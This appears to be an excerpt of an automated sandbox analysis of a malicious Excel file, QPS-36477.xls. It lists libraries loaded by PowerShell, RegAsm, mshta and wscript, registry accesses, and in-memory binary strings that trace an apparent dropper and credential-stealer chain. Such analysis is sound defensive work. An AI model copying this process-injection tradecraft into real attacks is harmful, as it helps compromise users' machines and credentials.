                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: QPS-36477.xlsStatic file information: File size 1094656 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.548581450.000007FE89A08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.551416551.000007FE89BC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.597286727.000007FE89BD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.596399479.000007FE89A18000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.pdb source: powershell.exe, 00000014.00000002.494874589.0000000002853000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.pdbhP source: powershell.exe, 00000007.00000002.453491405.0000000002F60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.540944210.000000001C700000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.490672178.000000001248F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.532162114.000000001233D000.00000004.00000800.00020000.00000000.sdmp
